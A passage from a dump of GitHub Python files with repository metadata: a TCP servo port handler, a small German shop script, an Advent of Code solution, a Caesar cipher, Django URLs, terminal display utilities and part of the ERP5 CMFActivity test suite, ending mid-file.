plot=True,fast=True)\n","repo_name":"alexandros-koutsioumpas/anaklasis","sub_path":"examples/thick_SiO2_layer_fit.py","file_name":"thick_SiO2_layer_fit.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"8667332583","text":"import time\nimport sys\n#import platform\nimport socket\n\nLATENCY_TIMER = 16\n\nSOCKET_TIMEOUT = .100\n\n\nclass TCPPortHandler(object):\n def __init__(self, port):\n self.is_open = False\n self.packet_timeout = 0.0\n self.tx_time_per_byte = 0.0\n\n self.is_using = False\n self.socket = None\n self.port = port\n\n\n def openPort(self):\n print(\"Opening \",self.port)\n try:\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.socket.settimeout(SOCKET_TIMEOUT)\n self.socket.connect(self.port)\n self.is_open = True\n return True\n except Exception as e:\n print (\"Port Open Failed with Exception: %s\"%(e))\n del self.socket\n self.socket = None\n self.is_open = False\n\n def closePort(self):\n if(self.is_open):\n self.socket.close()\n del self.socket\n self.socket = None\n self.is_open = False\n\n def readPort(self, length):\n if(not self.is_open):\n return \"\"\n try:\n return self.socket.recv(length)\n except Exception as ex:\n #print(\"Reading...\")\n #print(ex)\n # self.closePort()\n return \"\"\n\n def writePort(self, packet):\n if(not self.is_open):\n return 0\n try:\n return self.socket.send(bytes(packet))\n except Exception as ex:\n print(ex)\n return 0\n\n def clearPort(self):\n # timeout = self.socket.gettimeout()\n # try:\n # self.socket.settimeout(0)\n # self.socket.recv(1024)\n # finally:\n # self.socket.settimeout(timeout)\n pass\n\n def setPacketTimeout(self, packet_length):\n self.packet_start_time = self.getCurrentTime()\n self.packet_timeout = (self.tx_time_per_byte * packet_length) + (LATENCY_TIMER * 2.0) + 2.0\n\n def setPacketTimeoutMillis(self, msec):\n self.packet_start_time = self.getCurrentTime()\n self.packet_timeout = msec\n\n def isPacketTimeout(self):\n if self.getTimeSinceStart() > self.packet_timeout:\n self.packet_timeout = 0\n return True\n\n return False\n\n def getCurrentTime(self):\n return round(time.time() * 1000000000) / 1000000.0\n\n def getTimeSinceStart(self):\n time_since = self.getCurrentTime() - self.packet_start_time\n if time_since < 0.0:\n self.packet_start_time = self.getCurrentTime()\n\n return time_since\n ","repo_name":"Lordy2001/ServoController","sub_path":"dynamixel_sdk/tcp_port_handler.py","file_name":"tcp_port_handler.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27560300030","text":"\n\nimport sqlite3\nconnection = sqlite3.connect(\"Artikel.db\")\n\ncursor = connection.cursor()\n\n\nfor row in cursor.execute('SELECT * FROM Artikel'):\n print(row)\n\n# Artikeln anzeigen\nartikeln = [\n {'id': 1, 'artikel-nr': 10010, 'name':'Pullover', 'description':'das ist die beschreibung des Artikels','price':20.55,'status':True,'lagerbestand':100,'created_at': '2021-11-19 16:09:10','updated_at': '',},\n {'id': 2, 'artikel-nr': 10020, 'name':'Hose', 'description':'das ist die beschreibung des Artikels','price':50.99,'status':True,'lagerbestand':100,'created_at': '2021-11-19 16:09:10','updated_at': '',},\n {'id': 3, 'artikel-nr': 10030, 'name':'T-Shirt', 'description':'das ist die beschreibung des Artikels','price':20.55,'status':True,'lagerbestand':100,'created_at': '2021-11-19 
16:09:10','updated_at': '',},\n    {'id': 4, 'artikel-nr': 10040, 'name':'Schale', 'description':'das ist die beschreibung des Artikels','price':20.55,'status':True,'lagerbestand':100,'created_at': '2021-11-19 16:09:10','updated_at': '',},\n    {'id': 5, 'artikel-nr': 10050, 'name':'Mütze', 'description':'das ist die beschreibung des Artikels','price':20.55,'status':True,'lagerbestand':100,'created_at': '2021-11-19 16:09:10','updated_at': '',},\n    {'id': 6, 'artikel-nr': 10060, 'name':'Unterhose', 'description':'das ist die beschreibung des Artikels','price':20.55,'status':True,'lagerbestand':100,'created_at': '2021-11-19 16:09:10','updated_at': '',},\n    {'id': 7, 'artikel-nr': 10070, 'name':'Soken', 'description':'das ist die beschreibung des Artikels','price':20.55,'status':True,'lagerbestand':100,'created_at': '2021-11-19 16:09:10','updated_at': '',},\n]\n\n# shopping cart (Warenkorb)\nkorb = [\n    {'id': 1, 'count':3},\n]\n\n#print(artikeln)\n\n\ndef ArtileIndex():\n    # list every article with its price\n    print('show all articles')\n    # artikeln is a list of dicts, so iterate over its items directly\n    for artikel in artikeln:\n        print(artikel['name'], 'Price: ', artikel['price'])\n\ndef ArtikelStore():\n    # store a new article\n    artikel = {\n        'id': 8,\n        'artikel-nr': 10080,\n        'name':'Rosa Lutscher',\n        'description':'das ist die beschreibung des Artikels',\n        'price':20.55,\n        'status':True,\n        'lagerbestand':100,\n        'created_at': '2021-11-19 16:09:10',\n        'updated_at': '',\n    }\n    artikeln.append(artikel)\n\n    print(artikeln)\n\n    print('article saved')\n\n# call the store function\n#ArtikelStore()\n\n\ndef ArtikelEdit(id):\n    # edit an article\n    print('edit article')\n    for item in artikeln:\n        #print(item['id'])\n        if item['id'] == id:\n            print(item)\n            # hand the record over to the frontend\n\n\n# call the edit function\n#ArtikelEdit(5)\n\n\ndef ArtikelUpdate(id,request):\n    # update an article\n    #print(request['name'])\n    print('update article')\n    for item in artikeln:\n        #print(item['id'])\n        if item['id'] == id:\n            print('Before: ',item)\n            item['name'] = request['name']\n            item['description'] = request['description']\n            item['price'] = request['price']\n            item['lagerbestand'] = request['lagerbestand']\n\n            print('After: ',item)\n\n\n# sample update payload\nupdate_variable = {\n    'name':'Rote Hose',\n    'description':'ich bin der Test mit der Roten Hose',\n    'price':99.50,\n    'lagerbestand':50\n}\n\n#ArtikelUpdate(3, update_variable)\n\n\ndef ArtikelDelete(id):\n    # delete an article\n    print('delete article')\n    print(artikeln)\n    for index,item in enumerate(artikeln):\n        #print(item['id'])\n        if item['id'] == id:\n            artikeln.pop(index)\n            print(index)\n\n    print(repr(artikeln))\n\n#ArtikelDelete(7)\n\ndef warenKorb(id):\n    # add the article with the given id\n    # to the shopping cart\n    for item in artikeln:\n        if item['id'] == id:\n            korb.append(item)\n    print('articles now in the cart:', korb)\n# function call\n#warenKorb(7)\n\n\ndef artikelstand():\n    print(len(korb))\n    if len(korb) > 0:\n        print('cart is not empty')\n    else:\n        print('cart is empty')\n\n\n# function call\nartikelstand()\n\n\n# frontend\ndef allArticls():\n    for value in artikeln:\n        print(value['name'],value['id'],)\n\nallArticls()","repo_name":"shivaparto/PythonOnlineShop","sub_path":"DataLayer/all.py","file_name":"all.py","file_ext":"py","file_size_in_byte":4217,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"33173966878","text":"#!/usr/bin/env python3\n# Advent of Code 2022: Day 2 (part 2)\n# Submission by qxtal \n\nf = open('./input.txt', 
'r')\ngame_input = f.readlines()\nf.close()\n\n# This can definitely be done in a better way, but it works.\nlookup = {\n \"X\": { # Player: Needs to LOSE\n \"A\": 3 + 0, # Opponent: Rock - Player pick: Scissor\n \"B\": 1 + 0, # Opponent: Paper - Player pick: Rock\n \"C\": 2 + 0 # Opponent: Scissor - Player pick: Paper\n },\n \"Y\": { # Player: Needs to TIE\n \"A\": 1 + 3, # Opponent: Rock - Player pick: Rock\n \"B\": 2 + 3, # Opponent: Paper - Player pick: Paper\n \"C\": 3 + 3 # Opponent: Scissor - Player pick: Scissor\n },\n \"Z\": { # Player: Needs to WIN\n \"A\": 2 + 6, # Opponent: Rock - Player pick: Paper\n \"B\": 3 + 6, # Opponent: Paper - Player pick: Scissor\n \"C\": 1 + 6 # Opponent: Scissor - Player pick: Rock\n }\n}\n\nscore = 0\n\nfor line in game_input:\n opponent = line.split()[0]\n player = line.split()[1]\n score += lookup[player][opponent]\n\nprint(score)","repo_name":"qxtal/advent-of-code","sub_path":"2022/02/aoc-02b.py","file_name":"aoc-02b.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"992302676","text":"def menu():\n\tprint(\"-\"*20)\n\tprint(\"Menu: \")\n\tprint(\"1. Encode\")\n\tprint(\"2. Decode\")\n\tprint(\"-\"*20)\n\n\tchoice = int(input(\"Enter your choice: \"))\n\n\twhile choice not in (1, 2):\n\t\tchoice = int(input(\"Invalid, pls re-enter your choice: \"))\n\n\treturn choice\n\n\n\ndef cipher(char, n):\n\tnew_ascii = ord(char) + n\n\n\tif (new_ascii not in range(97, 122+1)) and (new_ascii not in range(65, 90+1)):\n\n\t\tif n > 0:\n\t\t\tnew_ascii = new_ascii - 26\n\t\t\t\n\t\telse:\n\t\t\tnew_ascii = new_ascii + 26\n\n\treturn chr(new_ascii)\n\n\n\ndef encode():\n\tstring = input(\"Msg to be encoded: \")\n\tn = int(input(\"Caesar value: \"))\n\n\tencoded_str = \"\"\n\n\tfor char in string:\n\t\tif char.isalpha():\n\t\t\tencoded_str += cipher(char, n)\n\n\t\telse:\n\t\t\tencoded_str += char\n\t\t\n\tprint(encoded_str)\n\n\n\ndef decode():\n\tstring = input(\"Msg to be decoded: \")\n\tn = int(input(\"Caesar value: \"))*(-1)\n\n\tdecoded = \"\"\n\n\tfor char in string:\n\t\tif char.isalpha():\n\t\t\tdecoded += cipher(char, n)\n\n\t\telse:\n\t\t\tdecoded += char\n\t\t\n\tprint(decoded)\n\n\n\nif __name__ == \"__main__\":\n\tchoice = menu()\n\n\tif choice == 1:\n\t\tencode()\n\telse:\n\t\tdecode()\n\n","repo_name":"howtoosee/Mini_Projects","sub_path":"caesar.py","file_name":"caesar.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"16946103406","text":"phs = ['AP',\n 'SP',\n 'a',\n 'ai',\n 'an',\n 'ang',\n 'ao',\n 'b',\n 'c',\n 'ch',\n 'd',\n 'e',\n 'ei',\n 'en',\n 'eng',\n 'er',\n 'f',\n 'g',\n 'h',\n 'i',\n 'ia',\n 'ian',\n 'iang',\n 'iao',\n 'ie',\n 'in',\n 'ing',\n 'iong',\n 'iu',\n 'j',\n 'k',\n 'l',\n 'm',\n 'n',\n 'o',\n 'ong',\n 'ou',\n 'p',\n 'q',\n 'r',\n 's',\n 'sh',\n 't',\n 'u',\n 'ua',\n 'uai',\n 'uan',\n 'uang',\n 'ui',\n 'un',\n 'uo',\n 'v',\n 'van',\n 've',\n 'vn',\n 'w',\n 'x',\n 'y',\n 'z',\n 'zh']\n\ndef get_initials_and_finals():\n initials = []\n finals = []\n for ph in phs:\n if ph in ('AP', 'SP'):\n continue\n elif ph[0] in ('a', 'e', 'i', 'o', 'u', 'v'):\n finals.append(ph)\n else:\n initials.append(ph)\n return initials, 
finals","repo_name":"OmniAiOrg/SonicScribe","sub_path":"utils/ph.py","file_name":"ph.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"tg","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"1619578317","text":"from django.conf.urls import url\nfrom . import views\nfrom rest_framework.urlpatterns import format_suffix_patterns\n\nurlpatterns = [\n url(r'^$', views.IndexView.as_view(), name='index' ),\n url(r'^apiv1/forecasts', views.ForecastList.as_view()),\n url(r'^register', views.UserFormView.as_view(), name='register' ),\n url(r'^login_user/$', views.login_user, name='login_user'),\n url(r'^logout_user/$', views.logout_user, name='logout_user'),\n]","repo_name":"abrophy/weather-app","sub_path":"weather/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15527112422","text":"\"\"\"\nUtilitary functions for displaying informations in the terminal\n\"\"\"\n\n# Standard modules\nimport os\nimport sys\nimport time\nimport operator\nimport functools\n# External modules\nimport torch\nfrom torch.nn.modules.module import _addindent\nimport torchinfo.torchinfo as torchinfo\n\ntry:\n _, term_width = os.popen('stty size', 'r').read().split()\n term_width = int(term_width)\nexcept ValueError:\n term_width = 80\n\nTOTAL_BAR_LENGTH = 65.\nlast_time = time.time()\nbegin_time = last_time\ndef progress_bar(current, total, msg=None):\n global last_time, begin_time\n if current == 0:\n begin_time = time.time() # Reset for new bar.\n\n cur_len = int(TOTAL_BAR_LENGTH*current/total)\n rest_len = int(TOTAL_BAR_LENGTH - cur_len) - 1\n\n sys.stdout.write(' [{}>{}]'.format('='*cur_len, '.'*rest_len))\n\n cur_time = time.time()\n step_time = cur_time - last_time\n last_time = cur_time\n tot_time = cur_time - begin_time\n\n L = []\n L.append(' Step: %10s' % format_time(step_time))\n L.append(' | Tot: %10s' % format_time(tot_time))\n if msg:\n L.append(' | ' + msg)\n\n msg = ''.join(L)\n sys.stdout.write(msg)\n for i in range(term_width-int(TOTAL_BAR_LENGTH)-len(msg)-3):\n sys.stdout.write(' ')\n\n # Go back to the center of the bar.\n for i in range(term_width-int(TOTAL_BAR_LENGTH/2)+2):\n sys.stdout.write('\\b')\n sys.stdout.write(' %d/%d ' % (current+1, total))\n\n if current < total-1:\n sys.stdout.write('\\r')\n else:\n sys.stdout.write('\\n')\n sys.stdout.flush()\n\ndef format_time(seconds):\n days = int(seconds / 3600/24)\n seconds = seconds - days*3600*24\n hours = int(seconds / 3600)\n seconds = seconds - hours*3600\n minutes = int(seconds / 60)\n seconds = seconds - minutes*60\n secondsf = int(seconds)\n seconds = seconds - secondsf\n millis = int(seconds*1000)\n\n f = ''\n i = 1\n if days > 0:\n f += str(days) + 'D'\n i += 1\n if hours > 0 and i <= 2:\n f += str(hours) + 'h'\n i += 1\n if minutes > 0 and i <= 2:\n f += str(minutes) + 'm'\n i += 1\n if secondsf > 0 and i <= 2:\n f += str(secondsf) + 's'\n i += 1\n if millis > 0 and i <= 2:\n f += str(millis) + 'ms'\n i += 1\n if f == '':\n f = '0ms'\n return f\n\n\ndef torch_summarize(model, input_size=None):\n \"\"\"Summarizes torch model by showing trainable parameters and weights.\"\"\"\n return torchinfo.summary(model, verbose=0, input_size=input_size)\n\ndef htmlize(txt):\n return txt.replace(' ', ' ').replace('\\n', ' 
\\n')\n","repo_name":"jeremyfix/deepcs","sub_path":"deepcs/display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71249237683","text":"import six\nimport inspect\nimport warnings\nfrom functools import wraps\nfrom itertools import product\nfrom AccessControl.SecurityManagement import getSecurityManager\nfrom AccessControl.SecurityManagement import setSecurityManager\nfrom AccessControl.SecurityManagement import newSecurityManager\nfrom Acquisition import aq_base, aq_parent\nfrom Products.ERP5Type.tests.utils import LogInterceptor\nfrom Testing import ZopeTestCase\nfrom Products.ERP5Type.tests.ERP5TypeTestCase import ERP5TypeTestCase\nfrom Products.ERP5Type.tests.utils import createZODBPythonScript\nfrom Products.ERP5Type.Base import Base\nfrom Products.CMFActivity import ActivityTool\nfrom Products.CMFActivity.Activity.SQLBase import INVOKE_ERROR_STATE\nfrom Products.CMFActivity.Activity.Queue import VALIDATION_ERROR_DELAY\nfrom Products.CMFActivity.Activity.SQLDict import SQLDict\nfrom Products.CMFActivity.Errors import ActivityPendingError, ActivityFlushError\nfrom Products.PluggableAuthService.PropertiedUser import PropertiedUser\nfrom erp5.portal_type import Organisation\nfrom AccessControl.SecurityManagement import newSecurityManager\nfrom zLOG import LOG\nfrom ZODB.POSException import ConflictError\nfrom DateTime import DateTime\nfrom Products.CMFActivity.ActivityTool import (\n cancelProcessShutdown, Message, getCurrentNode, getServerAddress)\nfrom MySQLdb import OperationalError\nfrom Products.ZMySQLDA.db import DB\nimport gc\nimport random\nimport threading\nimport weakref\nimport transaction\nfrom App.config import getConfiguration\nimport socket\n\nclass CommitFailed(Exception):\n pass\n\ndef for_each_activity(wrapped):\n def wrapper(self):\n getMessageList = self.portal.portal_activities.getMessageList\n for activity in ActivityTool.activity_dict:\n wrapped(self, activity)\n self.abort()\n self.assertFalse([\n x.__dict__ for x in getMessageList()\n ])\n return wraps(wrapped)(wrapper)\n\ndef registerFailingTransactionManager(*args, **kw):\n from Shared.DC.ZRDB.TM import TM\n class dummy_tm(TM):\n def tpc_vote(self, *ignored):\n raise CommitFailed\n def _finish(self):\n pass\n def _abort(self):\n pass\n dummy_tm()._register()\n\nclass LockOnce(object):\n\n def __init__(self):\n self.acquire = threading.Lock().acquire\n\n def release(self):\n pass\n\nclass TestCMFActivity(ERP5TypeTestCase, LogInterceptor):\n\n # Different variables used for this test\n company_id = 'Nexedi'\n title1 = 'title1'\n title2 = 'title2'\n company_id2 = 'Coramy'\n company_id3 = 'toto'\n\n def getTitle(self):\n return \"CMFActivity\"\n\n def getBusinessTemplateList(self):\n \"\"\"\n Return the list of business templates.\n \"\"\"\n return ('erp5_base', 'erp5_joblib')\n\n def getOrganisationModule(self):\n return self.portal.organisation_module\n\n def getOrganisation(self):\n return self.getOrganisationModule()._getOb(self.company_id)\n\n def afterSetUp(self):\n super(TestCMFActivity, self).afterSetUp()\n from Products.CMFActivity.ActivityRuntimeEnvironment import BaseMessage\n # Set 'max_retry' to a known value so that we can test the feature\n BaseMessage.max_retry = property(lambda self:\n self.activity_kw.get('max_retry', 5))\n self.login()\n # Then add new components\n organisation_module = self.getOrganisationModule()\n if 
not(organisation_module.hasContent(self.company_id)):\n o1 = organisation_module.newContent(id=self.company_id)\n self.tic()\n\n def tearDown(self):\n # Override ERP5 tearDown to make sure that tests do not leave unprocessed\n # activity messages. We are testing CMFActivity so it's important to check\n # that everything works as expected on this subject.\n try:\n if self._resultForDoCleanups.wasSuccessful():\n getMessageList = self.portal.portal_activities.getMessageList\n self.assertFalse(getMessageList())\n # Also check if a test drop them without committing.\n self.abort()\n self.assertFalse(getMessageList())\n finally:\n ERP5TypeTestCase.tearDown(self)\n\n def getMessageList(self, activity, **kw):\n return ActivityTool.activity_dict[activity].getMessageList(\n self.portal.portal_activities, **kw)\n\n def deleteMessageList(self, activity, message_list):\n ActivityTool.activity_dict[activity].deleteMessageList(\n self.portal.portal_activities.getSQLConnection(),\n [m.uid for m in message_list])\n self.commit()\n\n def login(self):\n uf = self.portal.acl_users\n uf._doAddUser('seb', '', ['Manager'], [])\n uf._doAddUser('ERP5TypeTestCase', '', ['Manager'], [])\n user = uf.getUserById('seb').__of__(uf)\n newSecurityManager(None, user)\n\n def ticOnce(self, *args, **kw):\n is_running_lock = ActivityTool.is_running_lock\n try:\n ActivityTool.is_running_lock = LockOnce()\n self.portal.portal_activities.tic(*args, **kw)\n finally:\n ActivityTool.is_running_lock = is_running_lock\n\n @for_each_activity\n def testInvokeAndCancelActivity(self, activity):\n \"\"\"\n Simple test where we invoke and cancel an activity\n \"\"\"\n activity_tool = self.portal.portal_activities\n organisation = self.getOrganisation()\n organisation._setTitle(self.title1)\n self.assertEqual(self.title1,organisation.getTitle())\n organisation.activate(activity=activity)._setTitle(self.title2)\n # Needed so that the message are commited into the queue\n self.commit()\n message_list = activity_tool.getMessageList()\n self.assertEqual(len(message_list),1)\n activity_tool.manageCancel(organisation.getPhysicalPath(),'_setTitle')\n # Needed so that the message are removed from the queue\n self.commit()\n self.assertEqual(self.title1,organisation.getTitle())\n message_list = activity_tool.getMessageList()\n self.assertEqual(len(message_list),0)\n organisation.activate(activity=activity)._setTitle(self.title2)\n # Needed so that the message are commited into the queue\n self.commit()\n message_list = activity_tool.getMessageList()\n self.assertEqual(len(message_list),1)\n activity_tool.manageInvoke(organisation.getPhysicalPath(),'_setTitle')\n # Needed so that the message are removed from the queue\n self.commit()\n self.assertEqual(self.title2,organisation.getTitle())\n\n @for_each_activity\n def testDeferredSetTitleActivity(self, activity):\n \"\"\"\n We check that the title is changed only after that\n the activity was called\n \"\"\"\n activity_tool = self.portal.portal_activities\n organisation = self.getOrganisation()\n organisation._setTitle(self.title1)\n self.assertEqual(self.title1,organisation.getTitle())\n organisation.activate(activity=activity)._setTitle(self.title2)\n # Needed so that the message are commited into the queue\n self.commit()\n self.assertEqual(self.title1,organisation.getTitle())\n activity_tool.tic()\n self.assertEqual(self.title2,organisation.getTitle())\n\n @for_each_activity\n def testCallOnceWithActivity(self, activity):\n \"\"\"\n With this test we can check if methods are called\n only once 
(sometimes it was twice !!!)\n \"\"\"\n activity_tool = self.portal.portal_activities\n def setFoobar(self):\n if hasattr(self,'foobar'):\n self.foobar = self.foobar + 1\n else:\n self.foobar = 1\n def getFoobar(self):\n return (getattr(self,'foobar',0))\n organisation = self.getOrganisation()\n Organisation.setFoobar = setFoobar\n Organisation.getFoobar = getFoobar\n organisation.foobar = 0\n organisation._setTitle(self.title1)\n self.assertEqual(0,organisation.getFoobar())\n organisation.activate(activity=activity).setFoobar()\n # Needed so that the message are commited into the queue\n self.commit()\n message_list = activity_tool.getMessageList()\n self.assertEqual(len(message_list),1)\n activity_tool.tic()\n self.assertEqual(1,organisation.getFoobar())\n message_list = activity_tool.getMessageList()\n self.assertEqual(len(message_list),0)\n organisation.activate(activity=activity).setFoobar()\n # Needed so that the message are commited into the queue\n self.commit()\n message_list = activity_tool.getMessageList()\n self.assertEqual(len(message_list),1)\n activity_tool.manageInvoke(organisation.getPhysicalPath(),'setFoobar')\n # Needed so that the message are commited into the queue\n self.commit()\n self.assertEqual(2,organisation.getFoobar())\n\n @for_each_activity\n def testTryFlushActivity(self, activity):\n \"\"\"\n Check the method flush\n \"\"\"\n organisation = self.getOrganisation()\n organisation._setTitle(self.title1)\n organisation.activate(activity=activity)._setTitle(self.title2)\n organisation.flushActivity(invoke=1)\n self.assertEqual(organisation.getTitle(),self.title2)\n self.commit()\n message_list = self.portal.portal_activities.getMessageList()\n self.assertEqual(len(message_list),0)\n self.assertEqual(organisation.getTitle(),self.title2)\n # Try again with different commit order\n organisation._setTitle(self.title1)\n organisation.activate(activity=activity)._setTitle(self.title2)\n self.commit()\n organisation.flushActivity(invoke=1)\n self.assertEqual(len(message_list),0)\n self.assertEqual(organisation.getTitle(),self.title2)\n self.commit()\n\n @for_each_activity\n def testTryActivateInsideFlush(self, activity):\n \"\"\"\n Create a new activity inside a flush action\n \"\"\"\n activity_tool = self.portal.portal_activities\n def DeferredSetTitle(self,value):\n self.activate(activity=activity)._setTitle(value)\n Organisation.DeferredSetTitle = DeferredSetTitle\n organisation = self.getOrganisation()\n organisation._setTitle(self.title1)\n organisation.activate(activity=activity).DeferredSetTitle(self.title2)\n organisation.flushActivity(invoke=1)\n self.commit()\n activity_tool.tic()\n self.commit()\n self.assertEqual(organisation.getTitle(),self.title2)\n\n @for_each_activity\n def testTryTwoMethods(self, activity):\n \"\"\"\n Try several activities\n \"\"\"\n activity_tool = self.portal.portal_activities\n def DeferredSetDescription(self,value):\n self._setDescription(value)\n def DeferredSetTitle(self,value):\n self._setTitle(value)\n Organisation.DeferredSetTitle = DeferredSetTitle\n Organisation.DeferredSetDescription = DeferredSetDescription\n organisation = self.getOrganisation()\n organisation._setTitle(None)\n organisation.setDescription(None)\n organisation.activate(activity=activity).DeferredSetTitle(self.title1)\n organisation.activate(activity=activity).DeferredSetDescription(self.title1)\n self.commit()\n activity_tool.distribute()\n activity_tool.tic()\n self.commit()\n self.assertEqual(organisation.getTitle(),self.title1)\n 
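The activate/cancel and call-once tests above all exercise the same life-cycle: activate() records a deferred call as a queued message, manageCancel() drops it before execution, and manageInvoke()/tic() executes it exactly once. A toy model of that life-cycle, with invented names (ToyQueue, Doc) and none of CMFActivity's persistence or SQL queues, might look like this:

class ToyQueue(object):
    def __init__(self):
        self.messages = []
    def activate(self, obj, method_id, *args):
        # Record a deferred call instead of executing it now.
        self.messages.append((obj, method_id, args))
    def cancel(self, obj, method_id):
        # Drop pending messages without executing them (manageCancel).
        self.messages = [m for m in self.messages
                         if not (m[0] is obj and m[1] == method_id)]
    def invoke_all(self):
        # Execute and consume every pending message (tic/manageInvoke).
        for obj, method_id, args in self.messages:
            getattr(obj, method_id)(*args)
        del self.messages[:]

class Doc(object):
    title = 'title1'
    def _setTitle(self, value):
        self.title = value

doc, queue = Doc(), ToyQueue()
queue.activate(doc, '_setTitle', 'title2')
queue.cancel(doc, '_setTitle')
assert doc.title == 'title1'   # cancelled before execution
queue.activate(doc, '_setTitle', 'title2')
queue.invoke_all()
assert doc.title == 'title2'   # executed exactly once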
self.assertEqual(organisation.getDescription(),self.title1)\n self.tic()\n\n @for_each_activity\n def testTryTwoMethodsAndFlushThem(self, activity):\n \"\"\"\n make sure flush works with several activities\n \"\"\"\n activity_tool = self.portal.portal_activities\n def DeferredSetTitle(self,value):\n self.activate(activity=activity)._setTitle(value)\n def DeferredSetDescription(self,value):\n self.activate(activity=activity)._setDescription(value)\n Organisation.DeferredSetTitle = DeferredSetTitle\n Organisation.DeferredSetDescription = DeferredSetDescription\n organisation = self.getOrganisation()\n organisation._setTitle(None)\n organisation.setDescription(None)\n organisation.activate(activity=activity).DeferredSetTitle(self.title1)\n organisation.activate(activity=activity).DeferredSetDescription(self.title1)\n organisation.flushActivity(invoke=1)\n self.commit()\n activity_tool.distribute()\n activity_tool.tic()\n self.commit()\n self.assertEqual(organisation.getTitle(),self.title1)\n self.assertEqual(organisation.getDescription(),self.title1)\n\n def TryActivateFlushActivateTic(self, activity,second=None,commit_sub=0):\n \"\"\"\n try to commit sub transactions\n \"\"\"\n activity_tool = self.portal.portal_activities\n def DeferredSetTitle(self,value,commit_sub=0):\n if commit_sub:\n transaction.savepoint(optimistic=True)\n self.activate(activity=second or activity,priority=4)._setTitle(value)\n def DeferredSetDescription(self,value,commit_sub=0):\n if commit_sub:\n transaction.savepoint(optimistic=True)\n self.activate(activity=second or activity,priority=4)._setDescription(value)\n Organisation.DeferredSetTitle = DeferredSetTitle\n Organisation.DeferredSetDescription = DeferredSetDescription\n organisation = self.getOrganisation()\n organisation._setTitle(None)\n organisation.setDescription(None)\n organisation.activate(activity=activity).DeferredSetTitle(self.title1,commit_sub=commit_sub)\n organisation.flushActivity(invoke=1)\n organisation.activate(activity=activity).DeferredSetDescription(self.title1,commit_sub=commit_sub)\n self.commit()\n activity_tool.distribute()\n activity_tool.tic()\n self.commit()\n self.assertEqual(organisation.getTitle(),self.title1)\n self.assertEqual(organisation.getDescription(),self.title1)\n\n @for_each_activity\n def testTryMessageWithErrorOnActivity(self, activity):\n \"\"\"\n Make sure that message with errors are not deleted\n \"\"\"\n activity_tool = self.portal.portal_activities\n def crashThisActivity(self):\n self.IWillCrash()\n organisation = self.getOrganisation()\n Organisation.crashThisActivity = crashThisActivity\n organisation.activate(activity=activity).crashThisActivity()\n # Needed so that the message are commited into the queue\n self.commit()\n message_list = activity_tool.getMessageList()\n LOG('Before MessageWithErrorOnActivityFails, message_list',0,[x.__dict__ for x in message_list])\n self.assertEqual(len(message_list),1)\n activity_tool.tic()\n # XXX HERE WE SHOULD USE TIME SHIFT IN ORDER TO SIMULATE MULTIPLE TICS\n # Test if there is still the message after it crashed\n message_list = activity_tool.getMessageList()\n self.assertEqual(len(message_list),1)\n activity_tool.manageCancel(organisation.getPhysicalPath(),'crashThisActivity')\n # Needed so that the message are commited into the queue\n self.commit()\n\n @for_each_activity\n def testDeferredSetTitleWithRenamedObject(self, activity):\n \"\"\"\n make sure that it is impossible to rename an object\n if some activities are still waiting for this object\n \"\"\"\n 
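TryActivateFlushActivateTic above optionally calls transaction.savepoint(optimistic=True) before activating, to check that subtransaction commits do not confuse the queues. As a reminder of what that call does on its own, here is a minimal standalone sketch against the transaction package (no data managers are joined here, so the rollback is trivially supported):

import transaction

transaction.begin()
# ... changes made here are flushed by the savepoint ...
savepoint = transaction.savepoint(optimistic=True)
# ... changes made after the savepoint can be undone selectively ...
savepoint.rollback()   # back to the savepoint; the transaction stays open
transaction.abort()    # or transaction.commit() to keep the earlier work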
organisation = self.getOrganisation()\n    organisation._setTitle(self.title1)\n    self.assertEqual(self.title1,organisation.getTitle())\n    organisation.activate(activity=activity)._setTitle(self.title2)\n    # Needed so that the message are commited into the queue\n    self.commit()\n    self.assertEqual(self.title1,organisation.getTitle())\n    self.assertRaises(ActivityPendingError,organisation.edit,id=self.company_id2)\n    self.portal.portal_activities.tic()\n\n  def TryActiveProcess(self, activity):\n    \"\"\"\n    Try to store the result inside an active process\n    \"\"\"\n    activity_tool = self.portal.portal_activities\n    organisation = self.getOrganisation()\n    organisation._setTitle(self.title1)\n    active_process = activity_tool.newActiveProcess()\n    self.assertEqual(self.title1,organisation.getTitle())\n    organisation.activate(activity=activity,active_process=active_process).getTitle()\n    # Needed so that the message are commited into the queue\n    self.commit()\n    activity_tool.distribute()\n    activity_tool.tic()\n    self.assertEqual(self.title1,organisation.getTitle())\n    result = active_process.getResultList()[0]\n    self.assertEqual(result.method_id , 'getTitle')\n    self.assertEqual(result.result , self.title1)\n    # Execute any further activity which may have been spawned by activity\n    # execution (ex: fulltext indexation of the active process).\n    self.tic()\n\n  def TryActiveProcessWithResultDict(self, activity):\n    \"\"\"\n    Try to store the result inside an active process using a result dict\n    \"\"\"\n    activity_tool = self.portal.portal_activities\n    organisation = self.getOrganisation()\n    organisation._setTitle(self.title1)\n    active_process = activity_tool.newActiveProcess()\n    self.assertEqual(self.title1,organisation.getTitle())\n\n    # Post SQLJoblib tasks with explicit signature\n    organisation.activate(activity=activity,active_process=active_process, signature=1).getTitle()\n    organisation.activate(activity=activity,active_process=active_process, signature=2).getTitle()\n    organisation.activate(activity=activity,active_process=active_process, signature=3).getTitle()\n\n    self.commit()\n    activity_tool.distribute()\n    activity_tool.tic()\n    result_dict = active_process.getResultDict()\n    result = result_dict[1]\n    self.assertEqual(result_dict[1].method_id, 'getTitle')\n    self.assertEqual(result.result , self.title1)\n    result = 